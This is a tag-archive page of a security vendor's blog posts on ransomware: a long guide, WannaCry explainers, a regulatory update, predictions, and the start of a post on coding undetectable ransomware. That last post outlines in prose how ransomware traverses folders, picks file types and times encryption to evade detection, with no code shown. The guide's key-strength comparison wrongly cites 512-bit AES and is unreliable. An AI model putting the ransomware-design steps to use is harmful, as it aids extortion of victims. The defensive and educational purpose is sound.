Tag Archives: ransomware

The Complete Guide to Ransomware

The Complete Guide to Ransomware

Table of Contents


Ransomware – malware that encrypts a victim’s data, extorting a ransom to be paid within a short time frame or risk losing all his files – has been around for quite some time. In 1989 the first known ransomware, dubbed the AIDS Trojan,  infected 20,000  floppy diskettes –remember those? The diskettes supposedly contained AIDS information on the virus, and were handed out during a conference. Upon loading the DOS-based software from the disk, the program counted the number of times the computer was rebooted. Once it reached 90, it would hide the directories, encrypt the names of the files and requested $189.00 to decrypt the files.

Ransomware has since evolved from its early sneaker-net roots, leveraging the Internet and email to spread to different computers. However, it still follows a predictable script, not all that different from the original AIDS Trojan. After entering our networks via a phishing attack, files get encrypted, and the user sees a notification with instructions on how to submit bitcoins in order to decrypt files.

Unfortunately, ransomware attackers have seen how lucrative ransom payments can be. With each attack worth hundreds to thousands of dollars or more, they’ve become even more ambitious with the amount they’re demanding, and how they’re demanding it.

How’s this for ambition: some attackers, even after you’ve paid them the ransom, only partially unlock the files in an effort to demand even more from vulnerable businesses. In one case, a hacker even demanded a ransom as high as one million dollars.

They’re also pushing the boundaries to see how quickly they’re able to extort from unprepared individuals and organizations. Recently, we were introduced to a different attack vector with WannaCry. Instead of a phishing attack, attackers used the NSA’s ETERNALBLUE exploit, allowing it to spread peer-to-peer within an organization, impacting vulnerable Windows machines – laptops, desktops, tablets, and servers.

The result? WannaCry was the fastest and largest ransomware attack we’ve seen so far. However, some security experts are already debating whether the latest NotPetya attack is even deadlier than WannaCry.

By experimenting with how an attack is released, how much to extort, the intensity and velocity in which they spread harm, hackers advance their knowledge base, changing how they develop new strains as well their attack vector.

What hasn’t changed is that it is still possible to detect and prevent a zero-day ransomware attack – that’s according to a Northeastern University ransomware research paper.  In Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks, this research team analyzed 1,359 ransomware samples between 2006 and 2014, and found that a “close examination on the file system activities of multiple ransomware samples suggests that by… protecting Master File Table (MFT) in the NTFS file system, it is possible to detect and prevent a significant number of zero-day ransomware attacks.”1

In this guide, we’ll help you better understand the role that bitcoin plays in ransomware, various types of ransomware, attack vectors, and cover a few mitigation methods.

What Bitcoin Has to Do With Ransomware

Bitcoin is often associated with ransomware because attackers typically request payments to be submitted in that form of currency. But what exactly is bitcoin?

Bitcoin is digital currency that lets you anonymously buy goods and services. You can send bitcoins digitally using a mobile phone app or computer. It’s as easy as swiping a credit card.

Bitcoins are stored in a digital wallet, which resides in the cloud or on a user’s computer. It’s similar to a bank account, but they’re not insured by the FDIC. Also, bitcoins aren’t tied to any country, subject to regulation, and there are no credit card fees.

Each bitcoin transaction is on a public log. Names of buyers and sellers are anonymous – only their wallet IDs are revealed. And it allows buyers or sellers do business without easily tracing it back to them. As a result, it’s become a popular choice for cybercriminals to choose bitcoin as a form of payment. To evade identification, many bitcoin addresses used by cybercriminals have no more than 6 transactions.2

To make a bitcoin payment, victims are often alerted to download anonymous browsers, such as Tor2web or Torproject, in order to visit a URL hosted on anonymous servers. Tor (The Onion Router) makes it difficult to trace the location of the server or the identity of its operators.

Should You Pay?

The short answer is: it depends.

But Some Say, Yes

At a Cybersecurity Summit, Joseph Bonavolonta, the Assistant Special Agent in charge of the FBI’s CYBER and Counterintelligence Program said, “To be honest, we often advise people just to pay the ransom.”

He explained, “The success of the ransomware ends up benefitting victims: because so many people pay, the malware authors are less inclined to wring excess profit out of any single victim, keeping ransoms low. And most ransomware scammers are good to their word. You do get your access back.”

If you pay, the FBI stated that most ransomware payments are typically between $200 and $10,0003.

But there have been instances where the payment has been much higher. In 2014, the City of Detroit’s files were encrypted and the attackers demanded a ransom of 2,000 bitcoins, worth about $800,000.4 Luckily, the ransom was not paid because the database wasn’t used or needed.

There might be times when you’re faced with other considerations. The Tennessee Dickson County Sheriff’s Office paid $622.00 in bitcoin to hackers who encrypted the department’s criminal case files, making them inaccessible to investigators.5 Detective Jeff McCliss said, “It really came down to a choice between losing all of that data – and being unable to provide the vital services that that data would’ve assisted us in providing the community versus spending 600-and-some-odd dollars to retrieve the data.” The department was lucky; it got back access to its files.6

Thou Shall Not Pay

Some security experts disagree with Mr. Bonavolonta’s remarks and urge you not to pay the ransom because there’s no guarantee that even after you pay the ransom, your files will return to its original state. Moreover, paying perpetuates an ongoing problem, making you a target for more malware.

In 2016 it was reported that a Kansas hospital hit with ransomware paid the ransom in hopes of getting back to business as soon as possible, but the payment only partially decrypted their files. Instead, the cybercriminals demanded more money to decrypt the rest. As a result, the hospital refused to pay a second ransom because it was no longer “a wise maneuver or strategy.”

Worse, if you get infected with a defective strain such as Power Worm you won’t get your files back regardless what you do. Even with the intent of paying the ransom, this attack will inevitably destroy the victim’s data during the encryption of their data.

Alternatively, if you encounter an attack like NotPetya where the intention wasn’t about financial gain, but destroying data, even if you stockpile bitcoins to pay the ransom, you won’t get your data back.

The Department of Homeland Security has also advised victims not to negotiate with hackers. Conflicting advice has prompted a debate about whether the FBI is encouraging behavior that will lead to more hacking.

In a Wall Street Journal interview, FBI spokeswoman Kristen Setera declined to say if FBI officials recommend paying a ransom to hackers, as Mr. Bonavolonta stated.7

Why You Should Work With Law Enforcement

John Carlin, former Assistant Attorney General for the U.S. Department of Justice’s National Security Division acknowledged in a recent podcast that there remains confusion at the FBI on whether or not you should pay.

He confirmed that the FBI officially does not encourage paying a ransom. However, similar to a kidnapping case, that doesn’t mean that if you go to law enforcement, that they’re going to recommend you not to pay.

But one thing is for certain. If you do go to law enforcement, they will be able provide a few insights that you wouldn’t otherwise know.

First, law enforcement can provide you with valuable information. Carlin advised “If it’s a group they’ve been monitoring, they can tell you…whether they’ve seen that group attack other actors before, and if they have, whether if you pay they’re likely to go away or not. Because some groups just take your money and continue.”

Secondly, he also identified a major benefit to working with law enforcement – you’ll be hedging against the risk of inadvertently paying off a terrorist when you pay the ransom. He advised, “You can end up violating certain laws when it comes to the Office of Foreign Assets Control by paying a terrorist or another group that’s designated as a bad actor. But more importantly, you do not want to be in a situation where it becomes clear later that you paid off a terrorist.”

But Before You Pay, Find Out If There’s A Decryption Tool

Finally, if you are faced with managing a ransomware attack, go online to see if a decryption tool exists. If you’re able to find the keys, there’s no need to pay. Sometimes, when the police and security experts investigate cybercriminal activity, they can potentially obtain decryption keys from malicious servers and share them online, like for CoinVaultTeslaCrypt, or the popular CryptoLocker.

Keep in mind, whether or not you pay the ransom, the cumulative cost of a ransomware attack is typically greater than the ransom. The cost to the brand, loss of productivity, legal fees, etc all accrue once the attack vector is triggered.

Perhaps another way that might help you decide is to understand the type of ransomware you’re dealing with.

Major Ransomware Types

Let’s get started. In Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks, researchers identified three major types: encryption, deletion, and locking.


CryptoLocker and CryptoWall have a reputation for being strong encryption ransomware. Encryption is the process of applying an algorithm (also known as ciphers) to data so it is unintelligible to anyone. And to decrypt the data, you’ll need keys. There are two types: symmetric and public.

Symmetric Keys

Advanced Encryption Standard (AES), Rivest Cipher 4 (RC4), and Data Standard Encryption Standard (DES) are examples of a symmetric-key algorithm. With symmetric, the same key is used for both encryption and decryption. It’s only effective when the symmetric key is kept secret by the two parties involved.


Public Keys (Asymmetrical Key)

Rivest, Shamir, & Aldeman use two different keys in their famous RSA algorithm. A public key that everyone has access to, and  a private key that is controlled by the person who you wish to communicate with.


Strength of an Encryption

To understand the strength of the encryption, you have to look at both the type of encryption being used –whether symmetric or public/asymmetric – and the key length.

Two important facts: the longer the key, the stronger the encryption,  and key length is measured in bits.

Breaking an Encryption

For a symmetric algorithm, you’ll need a couple of hours of computer time for something like a 20-bit key or years for a 128-bit key (2128 = 340282366920938463463374607431768211456 possible keys of 128-bits)

For a public key algorithm, a key length of 32-bits would only require 232 combinations.  Even a 512-bit can be easily broken (within a few months), but 2,048-bit is far harder.

Comparing public and symmetric keys can be confusing. Here’s a rough benchmark:  a 350-bit RSA key is roughly considered the same strength to 40-bit RC4, and 512-bit AES.

The wonky reasons for these differences in key-breaking speeds has to do with the fact that in RSA, you have to factor a number—don’t ask!

Ransomware Encryptions

The first ransomware variants used a symmetric-key algorithm and eventually upgraded to public-keys. Today, more advanced ransomware use a combination of symmetric and public.

Most cybercriminals probably wouldn’t use a public key to encrypt large file system because it is much slower than a symmetric key encryption. And taking too long to encrypt files could thwart the ransomware operation before the encryption process is fully completed.

So a better idea is to use symmetric techniques to quickly encode the file data, and asymmetric to encode the key.  In CryptoLocker, for example, AES (symmetric) was used for file encryption, and RSA (public) for AES key encryption.

Another blend you might see in the near future is elliptical curve cryptography (ECC) and RSA. ECC is described as the next generation of public key, in which you can create faster, smaller, and more efficient cryptographic keys. Some researchers say that ECC can yield a level of security with a 164-bit key that other systems require a 1,024-bit key to achieve.8


With deletion, attackers threaten and warn: any of your attempts to decrypt files would only result in an “irrevocable loss of your data.”9 Or if you don’t pay, the files get deleted. Popular examples of deletion include Gpcode and FileCoder.­

Typically when we delete something, we wipe it off the disk. But in analyzing all the samples, the researchers learned that lots of data remained on disk because attackers were lazy, often choosing the easiest path. However, they’re also very clever. The researchers found that while the NTFS Master File Table indicated that files were deleted, the files were actually still on disk, so recovery is potentially possible. However, depending on the strain and how ransomware evolves, there’s also the potential that your data might be destroyed.


With locking, attackers create a new login screen or html page that makes it appear as though a law enforcement agency has taken over the computer. They display a warning pertaining to laws such as copyrighted materials or child pornography. Or they might disable other components, typically keyboard shortcuts. Examples include: Winlock and Urausy.

Attack Vectors

You can bet that new types of ransomware are constantly being developed, including attack vectors that aren’t like the usual garden variety, such as malvertising, ransomworm, and peer-to-peer file transfer programs.

As I was once reminded by a security pro, attacks don’t need to be complicated. It can be something as simple as a link in an email or an email attachment and that’s what most ransomware strains rely on to get in your network. Therefore curious individuals who can’t resist clicking on links or opening attachments would benefit from security awareness training.

Let’s not forget the devastating effects of WannaCry and NotPetya, so make sure your software is up-to-date so that your security updates are also up-to-date!

We’re also seeing more instances of Ransomware-as-a-Service, where hackers sell their malware to other cybercriminals, increasing the frequency and reach of ransomware. Ransomware authors can enlist anyone to sign up and everyone would earn a percentage of the profits. To combat this problem, organizations might benefit from a few mitigation strategies, which we’ll cover later.

What to Do After You’ve Been Infected

Most people don’t realize they’ve been infected until your screen displays a ransom note, notifying that your files have been encrypted. If you discover that your computer has been infected, shutdown your computer or disconnect from the network.

If you’ve decided against paying the ransom, scan your computer with an anti-virus or anti-malware program and let it remove everything. You can potentially use PowerShell or other tools to identify encrypted files, but with a new ransomware variant popping up every week, there isn’t a one size fits all identification and decryption tool. What most experts recommend is to restore from a backup.

One caveat is that backups aren’t 100% fail safe. Some ransomware strains will either encrypt your backups or worse, hide in your backups so that after you restore files they will attack again.

However, if you decide to pay the ransom, you have our sympathy! We empathize and understand what a pain it must have been and hope that once you pay, all your files get decrypted. Don’t forget to scan your computer with an anti-virus or anti-malware program and let it remove everything. Also review the mitigation methods below!

Mitigation Methods

Monitor File System Activity

After looking at 1,359 ransomware samples, the Northeastern University researchers learned that it is possible to stop a large number of ransomware attacks, even those using deletion and encryption capabilities.

Significant changes occur in the file system (i.e., large number of deletions in the log) when the system is under attack. By closely monitoring the file system logs and configuring your monitoring solution to trigger an alert when this behavior is observed, you can detect the creation, encryption, or deletion of files.

User Behavior Analytics or Signature-Based?

Some IT pros have turned to endpoint security solutions in the hope that it will detect and stop crypto-malware. However, the industry is catching on to the fact that, as one observer put it, “signature-based antivirus software that most organizations still rely on to defend them can’t cope with modern attacks.”

A recent CIO article described the drawback best:

 “… while a signature-based approach reduces the performance hit to the systems on which it runs, it also means somebody has to be the sacrificial sheep. Somebody has to get infected by a piece of malware so that it can be identified, analyzed and other folks protected against it. And in the meantime the malefactors can create new malware that signature-based defenses can’t defend against.”

Bottom line: endpoint security solutions can’t block unknown ransomware variants by, for example, blacklisting connections to a current (but outdated) list of C&C servers. They’re also bound to a device/user/process, and so don’t provide any anti-heuristics or debugging techniques.

Instead, User Behavior Analytics (UBA) has become an essential go-to ransomware prevention measure. It’s also been known to detect zero-day ransomware attacks as well.

Defending the inside from legitimate users is just not part of the equation for perimeter-based security, and hackers are easily able to go around the perimeter and get inside. They entered through legitimate public ports (email, web, login) and then gain access as users.

Once in, cybercriminals have become clever at implementing a ransomware attack that isn’t spotted by anti-virus software.

In fact, to an IT admin who is just monitoring their system activity, the attackers appear as just another user.

And that’s why you need UBA!

UBA really excels at handling the unknown. In the background, the UBA engine can baseline each user’s normal activity, and then spot variances and report in real time – in whatever form they reveal themselves. For instance, an IT admin can configure a rule to, say, spot thousands of “file modify” actions in a short time windows.

UBA takes a cross-system approach, too. i.e., it can notice abnormal file behavior combined with weird email actions combined with weird login behavior (from AD). We should mention that: the best UBA benefits from having the most context. Think of UBA as File System Monitoring 2.0 – and keep in mind that the best UBA benefits from having the most context.

Create Honeypots

Cybercriminal may avoid encrypting all files and start by encrypting recently accessed files. Create a decoy by creating fake files and folders and monitor regularly.

This is also a good method for organizations that don’t have an automated solution to monitor file access activity. That also means you might be forced to enable file system native auditing. However, it unfortunately taxes your monitored systems. Instead, prioritize sensitive areas and set up a file share honeypot.

A file share honeypot is an accessible file share that contains files that look normal or valuable, but in reality are fake. As no legitimate user activity should be associated with a honeypot file share, any activity observed should be scrutinized carefully. If you’re stuck with manual methods, you’ll need to enable native auditing to record access activity, and create a script to alert you when events are written to the security event log (e.g. using dumpel.exe).

Least Privilege Model

Another approach is to control access to data and work towards achieving a least privilege model.  Your goal is to reduce exposure quickly by removing unnecessary global access groups from access control lists. Groups such as “Everyone,” “Authenticated Users,” and “Domain Users” when used on data containers (like folders and SharePoint sites) can expose entire hierarchies to all users in a company.  In addition to being easy targets for theft or misuse, these exposed data sets are very likely to be damaged in a malware attack. On file servers, these folders are known as “open shares”—where  both file system and sharing permissions are accessible via a global access group.

Additional Resources

1 http://seclab.ccs.neu.edu/static/publications/dimva2015ransomware.pdf

2 http://seclab.ccs.neu.edu/static/publications/dimva2015ransomware.pdf

3 https://www.ic3.gov/media/2015/150623.aspx

4 http://www.detroitnews.com/story/news/politics/michigan/2014/11/17/north-american-international-cyber-summit/19162001/

5 http://www.nbcnews.com/nightly-news/security-experts-you-should-never-payransomware-hackers-n299511

6 http://www.nbcnews.com/nightly-news/security-experts-you-should-never-pay-ransomware-hackers-n299511

7 https://www.wsj.com/articles/paying-ransoms-to-hackers-stirs-debate-1447106376%0D

8 http://searchsecurity.techtarget.com/definition/elliptical-curve-cryptography

9 http://www.anti-spyware-101.com/remove-filecoder-ransomware

Why did last Friday’s ransomware infection spread globally so fast?

Why did last Friday’s ransomware infection spread globally so fast?

Quick ransomware background

Ransomware is a type of malware that encrypts your data and asks for you to pay a ransom to restore access to your files. Cyber criminals usually request that the ransom be paid in Bitcoins: the #1 cryptocurrency (basically a distributed ledger) which can be used to buy and sell goods. By nature, Bitcoin transactions (e.g. ransom payments) are very difficult to trace.

Historically, most ransomware infections use the attack vector – how they get in – of social engineering (like clickbait from a social media platform – think cute kitty pics on Facebook or Twitter) or email phishing campaigns, which contain attachments or links to a website. The end result is that a malicious payload gets a foothold on a machine inside a corporate network. Unfortunately, all of those next generation perimeter defenses that organizations spend good money on are not that difficult to bypass in order to get inside.

Once inside, most ransomware will scan the internal network to see which servers host file shares, attempts to connect to each share, encrypt its contents, and then demand a ransom be paid to regain access to the now encrypted files. End users can usually access way more data than they should be able to: either through wide open permissions or by accumulating permissions over the course of their employment at their company. Think for a minute just often you’ve stumbled across a folder or files which you know you shouldn’t be able to access. Access controls are out of control. In this case, IT is typically blind because of the sheer complexity of file system permissions.

Good to know, but what was different last week?

Without going too much into the technical details, I can tell you that the code behind the biggest ransomware outbreak in history isn’t actually all that special. It’s a type of cryptoworm: a self-propagating malicious form of malware. That means that once it gets a foothold, it can spread autonomously without the need for someone to remote control it.

Normally, ransomware targets unstructured data hosted on file shares – this ransomware, however, did not discriminate.

In April, several hacking tools created by the NSA were leaked online. These hacking tools exploit vulnerabilities in hardware and software so that they can hack into or move laterally around a computer network.

WannaCry ransomware (also known as WCry / WanaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r) – the type responsible for last Friday’s attack – went a few steps further: once it got onto even a single machine within a corporate network, it did the following:

  • Looped through any open RDP (Remote Desktop) sessions, to encrypt data on the remote machine
  • Sought out any vulnerable* Windows machines – endpoints (laptops/desktops/tablets) and servers using Microsoft vulnerabilities
  • Used the traditional approach of going after file shares directly from the endpoint

*The particular vulnerability that made the difference last week was in the Microsoft SMBv1 file sharing protocol, which was used to hop from machine to machine encrypting data – like a spider web effect. Most internal servers are separated on internal networks so that end users can’t access them. The cryptoworm would need to hit just one internal server (e.g. a file server) and from there it would target whatever vulnerable servers that file server can access. This allowed it to quickly traverse entire networks, effectively crippling many of them. Like many cryptoworms, it’s self-propagating and so replicates itself and searches out to other vulnerable hosts/computer networks worldwide.

The truth is that the worldwide infection could have been much worse if not for the quick thinking of a security researcher. @MalwareTechBlog spotted that the malware code was connecting out to a nonsensical domain, which was not registered. This call out was hard-coded in case the creator wanted to stop it and likely also to help avoid IDS/IPS sandboxing techniques. If the request comes back showing that the domain is live, the “kill switch” kicks in to stop the malicious part of the code from executing – effectively stopping the malware in its tracks. @MalwareTechBlog, acting on a hunch, registered the domain name and was immediately registering thousands of connections every second. The result was that he stopped what could have been a much wider spread infection.

The bad news is that new versions of the code are already in development: https://www.bleepingcomputer.com/news/security/with-the-success-of-wannacry-imitations-are-quickly-in-development/

Lessons Learned

Microsoft released a patch (software code update to fix vulnerabilities) for this particular SMBv1 vulnerability back in March. The sad truth of the matter is that proper vulnerability patch management processes would mean that most organizations would not have been so badly affected.

That’s not to say that vulnerability patch management processes are enough coverage for ransomware. Nor are backups, since some ransomware will hide in your backups so that after you restore files they will simply attack again.

There is no one stop shop for stopping ransomware infections or any cyber security threat for that matter. Security is all about risk reduction – and requires a layered approach with controls in place at each layer while leveraging solutions to automate processes wherever possible. If any organization says that they’re 100% safe from cyber-attacks, then they’re either delusional or telling you porky pies!

🚨 Massive Ransomware Outbreak: What You Need To Know

🚨 Massive Ransomware Outbreak: What You Need To Know

Remember those NSA exploits that got leaked a few months back? A new variant of ransomware using those exploits is spreading quickly across the world – affecting everyone from the NHS to telecom companies to FedEx.

Here’s What We Know So Far

Ransomware appears to be getting in via social engineering and phishing attacks, though vulnerable systems may also be at risk if TCP port 445 is accessible. Unlike most ransomware that encrypts any accessible file from a single infected node, this ransomware also moves laterally via exploit (i.e., EternalBlue) to vulnerable unpatched workstations and servers, and then continues the attack. Unpatched windows hosts (Vista, 7, 8,10, server 2008, 2008 R2, 2012, 2012 R2, and 2016) running SMB v1 are all vulnerable.

Infected hosts are running strains of ransomware, such as Wanna Decrypt0r (more below) that encrypts files and changes their extensions to:

  •  .WRNY
  • .WCRY (+ .WCRYT for temp files>
  • .WNCRY (+ .WNCRYT for temp files)

The Ransomware also leaves a note with files named @Please_Read_Me@.txt, or !Please_Read_Me!.txt, and will display an onscreen warning.

Here’s What You Can Do

MS17-010, released in March, closes a number of holes in Windows SMB Server. These exploits were all exposed in the recent NSA hacking tools leak. Exploit tools such as EternalBlue, EternalChampion, EternalSynergy and EternalRomance (all part of the Fuzzbunch exploit platform) all drop DoublePulsar onto compromised hosts. DoublePulsar was created by the NSA and is basically a malware downloader, which is used as an intermediary for downloading more potent malware executables onto infected hosts.

If you’re an existing DatAlert customer, you can set up office hours with your assigned engineer to review your threat models and alerts. Don’t have DatAlert yet?  Get a demo of our data security platform and see how to detect zero-day attacks.

DatAlert Customers

If you’re a DatAlert Analytics customer, the threat model “Immediate Pattern Detected: user actions resemble ransomware” was designed to detect this and other zero-day variants of ransomware; however, we also strongly recommend that you update the dictionaries used by DatAlert signature-based rules. Instructions for updating your dictionaries are here: https://connect.varonis.com/docs/DOC-2749

If for some reason you can’t access the connect community, here is how to update your dictionaries to include the new extensions for this variant:

Open the DatAdvantage UI > Tools > Dictionaries > Crypto files (Predefined)

Open the DatAdvantage UI > Tools > Dictionaries > Encrypted files (Predefined)



The Malware exploits multiple Windows SMBv1 Remote Code vulnerabilities:

Windows Vista, 7, 8,10, server 2008, 2008 R2, 2012, 2012 R2, 2016 are all vulnerable if not patched and SMBv1 Windows Features is enabled.


Ransomware strains

WCry / WannaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r

This outbreak is version 2.0 of WCry ransomware which first appeared in March. Until this outbreak, this ransomware family was barely heard of. Though likely spread via phishing and social engineering attacks, if tcp port 445 is exposed on vulnerable windows machines, that could be exploited using the Fuzzbunch exploit platform.

Other helpful links


Planet Ransomware

Planet Ransomware

If you were expecting a quiet Friday in terms of cyberattacks, this ain’t it. There are reports of a massive ransomware attack affecting computers on a global scale: in the UK, Spain, Russia, Ukraine, Japan, and Taiwan.

The ransomware variant that’s doing the damage is called WCry, also known as WannaCry or WanaCrypt0r. It has so far claimed some high-profile targets, including NHS hospitals in the UK, and telecom and banking companies in Spain.

Be calm and carry on, of course.

In the blog, we’ve been writing about ransomware over the last two years, and we have great educational resources to help you prevent or reduce the damage of an attack.

Here’s a quick overview of our content.

What is it?

Our ransomware guide: https://blog.varonis.com/the-complete-ransomware-guide/ 

Learning more

The Troy Hunt course: https://blog.varonis.com/introduction-to-ransomware-course/

How it spreads

Yes, it can have worm-like features: https://blog.varonis.com/next-gen-ransomware-ransomworm-gets-deadlier/

Can I make my own (for research purposes)?

Yes, but only under adult supervision:



Reducing the risk

Limiting file access really, really helps: https://blog.varonis.com/the-best-ransomware-defense-dont-have-files/

Legal and Regulatory Implications

For US companies, this is what you need to know: https://blog.varonis.com/ransomware-the-legal-cheat-sheet-for-breach-notification/

Should you pay?

It depends:



Is a decryption solution available?

Check here: https://www.varonis.com/ransomware-identifier/

The ultimate answer to ransomware

User Behavior Analytics (UBA): https://blog.varonis.com/why-uba-will-catch-the-zero-day-ransomware-attacks-that-endpoint-protection-cant/

And here’s proof:  https://www.varonis.com/ransomware-solutions




Update: New York State Finalizes Cyber Rules for Financial Sector

Update: New York State Finalizes Cyber Rules for Financial Sector

When last we left New York State’s innovative cybercrime regulations, they were in a 45-day public commenting period. Let’s get caught up. The comments are now in. The rules were tweaked based on stakeholders’ feedback, and the regulations will begin a grace period starting March 1, 2017.

To save you the time, I did the heavy lifting and looked into the changes made by the regulators at the New York State Department of Financial Services (NYSDFS).

There are a few interesting ones to talk about. But before we get into them, let’s consider how important New York State — really New York City — is as a financial center.

Made in New York: Money!

To get a sense of what’s encompassed in the NYDFS’s portfolio, I took a quick dip into their annual report.

For the insurance sector, they supervise almost 900 insurers with assets of $1.4 trillion and receive premiums of $361 billion. Under wholesale domestic and foreign banks — remember New York has a global reach — they monitor 144 institutions with assets of $2.2 trillion. And I won’t even get into community and regional banks, mortgage brokers, and pension funds.

In a way, the NYSDFS has the regulatory power usually associated with a small country’s government. And therefore the rules that New York makes regarding data security has an outsized influence.

One Rule Remains the Same

Back to the rules. First, let’s look at one key part that was not changed.

NYSDFS received objections from the commenters on their definition of cyber events. This is at the center of the New York law—detecting, responding, and recovering from these events—so it’s important to take a closer look at its meaning.

Under the rules, a cybersecurity event is “any act or attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or information …”

Some of the commenters didn’t like the inclusion of “attempt” and “unsuccessful”. But the New York regulators held firm and kept the definition as is.

Cybersecurity is a broader term than a data breach. For a data breach, there usually has to be data access and exposure or exfiltration. In New York State, though, access alone or an IT disruption, even when attempted (or executed but not successfully) is considered an event.

As we’ve pointed out in our ransomware and the law cheat sheet, very few states in the US would classify a ransomware attack as a breach under their breach laws.

But in New York State, if ransomware (or a remote access trojan or other malware) was loaded on the victim’s server and perhaps abandoned or stopped by IT in mid-hack, it would indeed be a cybersecurity event.

Notification Worthy

This leads naturally to another rule, notification of a cybersecurity event to the New York State regulators, where the language was tightened.

The 72-hour time frame for reporting remains, but the clock starts ticking after a determination by the financial company that an event has occurred.

The financial companies were also given more wiggle room in the types of events that require notification: essentially the malware would need to “have a reasonable likelihood of materially harming any material part of the normal operation…”

That’s a mouthful.

In short: financial companies will notify the regulators at NYSDFS when the malware could seriously affect an operation that’s important to the company.

For example, malware that infects the digital console on the bank’s espresso machine is not notification worthy. But a key logger that lands in a bank’s foreign exchange area and is scooping up user passwords is very worthy.

The NYDFS’s updated notification rule language, by the way, puts it more in line with other data security laws, including the EU’s General Data Protection Regulation (GDPR).

So would you have to notify the New York State regulator when malware infects a server but hasn’t necessarily completed its evil mission?

Getting back to the language of “attempt” and “unsuccessful” found in the definition of cybersecurity events, it would appear that you would but only if the malware lands on a server that’s important to the company’s operations — either because of the data it contains or its function.

State of Grace

The original regulation also said you had to appoint a Chief Information Security Officer (CISO) who’d be responsible for seeing this cybersecurity regulation is carried out. Another important task of the CISO is to annually report to the board on the state of the company’s cybersecurity program.

With pushback from industry, this language was changed so that you can designate an existing employee as a CISO — likely a CIO or other C-level.

One final point to make is that the grace period for compliance has been changed. For most of the rules, it’s still 180 days.

But for certain requirements – multifactor authentication and penetration testing — the grace period has been extended to 12 months, and for a few others – audit trails, data retention, and the CISO report to the board — it’s been pushed out to 18 months.

For more details on the changes, check this legal note from our attorney friends at Hogan Lovells.

Can Our Crystal Ball Hack It? 2017 Varonis Cybersecurity Predictions

Can Our Crystal Ball Hack It? 2017 Varonis Cybersecurity Predictions

Everyone makes predictions at this time of year, but who looks back to check on their accuracy? Let’s have a look at some of last year’s omens before directing our forecast lens to 2017.

Our first prediction for 2016: The U.S. Presidential campaign will be affected by a cyber attack.

We were on to something here, but we should have said numerous attacks. From Wikileaks exposing internal campaign emails to allegations that Russia attempted to affect the outcome, security became a front-and-center issue.

We also predicted: Ransomware damage will double.

We had the right direction but the problem actually became far worse than our modest foreboding (a real kick in the crystal ball). While 2015 saw about $325 million in ransom from CryptoLocker alone, 2016 will likely hit $1 billion in ransomware damages according to the FBI.

Amid the hacked ruins, compromised confidences and costly shakedowns of 2016 is the realization that privacy can never truly be assured for modern communications.

Let’s see what 2017 will bring.

1. Extortionware will be the new lucrative thing.

Ransomware’s more targeted, more difficult and more lucrative cousin, will emerge and cause major financial damages because of the sheer size of the payouts demanded when highly sensitive data is threatened with exposure. This will go largely unreported for reasons of discretion, making the prescience of this prediction conveniently unverifiable next year.

2. Ransomware will continue to be a major thing (and backups aren’t enough).

Ransomware will continue to grow in terms of the sheer number and frequency of attacks on organizations. IT best practices for defending against ransomware will expand from backup remediation to early detection and alerting as user behavior analytics become more intelligent and predictive. Stopping an attempted attack – before or right after it starts – is far more efficient and less painful than figuring out which files were affected and restoring them from backup.

3. Threats within will drive the need for smarter security analytics.

Adoption of security analytics will increase, as insider threats continue to get CXO and board-level attention. Insiders have legitimate access to systems and data, so preventing initial access is more than impractical. Detection is the next line of defense for employees or contractors who abuse their access, and to reveal insider credentials that are stolen.

4. Goodbye, ads. Hello, blockers.

The use of ad blockers will skyrocket after another major media site becomes a distributor of malware (as Forbes was in 2016) and users take more deliberate command of their own protection against growing malware threats.

5. Weaponizing IoT will become a regular occurrence.

IoT (Internet of Things) devices such as DVRs and security cameras will become more frequent targets for attackers. While the devices themselves may not all contain valuable data, they represent potential stepping stones on a hacker’s path to steal digital assets. The Mirai botnet, capable of some of the biggest attacks yet and able to reach high volumes with minimal ramp-up time, will threaten the adoption of IoT applications as device makers realize they must make security a design principle or lose their markets.

6. You’re hired, Ms. IT Security Candidate.

With $1 trillion predicted to be spent globally on cybersecurity between 2017 and 2021 and more than 200,000 security jobs currently unfilled in the U.S., computer security skills will continue to be the hottest kind in the IT job market in terms of the number of unfilled jobs and the compensation levels.

7. Organizations will need to save users from themselves.

User education on password hygiene and recognizing potential attacks will continue to increase but the reality will sink in that vigilance alone will not suffice, as phishing and malware become more and more difficult for even careful employees to detect. Organizational remedies will become more widespread to protect their employees, customers, partners, and themselves.

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

This article is part of the series "Malware Coding Lessons for IT People". Check out the rest:

Let’s not overthink ransomware! It’s just a small malicious piece of code with one devious goal — encrypting all of the user’s important files. It the unfortunate victim wants to recover them he or she will have to pay a hefty amount to retrieve the decryption key.

How hard is ransomware?

In this post, I’ll show you how incredibly easy it is to code a FUD (Fully Undetected) ransomware using public Microsoft libraries with C#.

Ransomware 101

As I discussed in my previous post, there are a few ways to get infected with malware – for starters, malicious attachments, rogue websites, and phishing campaigns, as well as some other creative methods I’ll cover in a future post.

Ok, say we’ve clicked on a malicious ransomware file. What’s going to happen next? Persistency!

Persistency is the code used by hacker to enable the malware to survive restarts and to disguise the software so it would be hard to detect (and remove). While persistency is (usually) generic across many different malware families, there are some unique techniques for ransomware. I’ll get into this in a future post.

At its core, ransomware is just software that performs bulk encryption of the data contents in the victim’s file system. Typically, asymmetric encryption — with different keys for encryption and decryption — is preferred by hackers since it is much harder to recover the data.

This asymmetric algorithm is based on the idea of encrypting the files contents with a public key, but using a different private key that only that attacker has for decryption. You can learn more about asymmetric encryption here: https://en.wikipedia.org/wiki/Public-key_cryptography.

The malware can also choose a weaker encryption method, such as symmetric encryption algorithm, in which the same key is used for both encryption and decryption.

To make the code even simpler, we will use an API that does the symmetric encryption algorithm.

And Now the Code

The next part of the software that newbies need to know about is traversing the file system. Essentially, you’re travelling through the directory hierarchy, collecting file pathname, and then feeding the file contents to the encryption engine. Then of course the file has to be written back.

The list of the files to be encrypted is usually the ones companies are dependent on. We’re talking documents, spreadsheets, images, presentations, audio, and emails. By the way, hackers usually will not encrypt movies due to the size and the impact on the malwares performance. That’s a small consolation—employees can be watching movies while IT is restoring from a backup.

Once the files list is generated after navigating the directories, it’s a good idea to wait for an appropriate time to start the encryption. The idea is to then encrypt as much file contents as possible from the list before being detected.

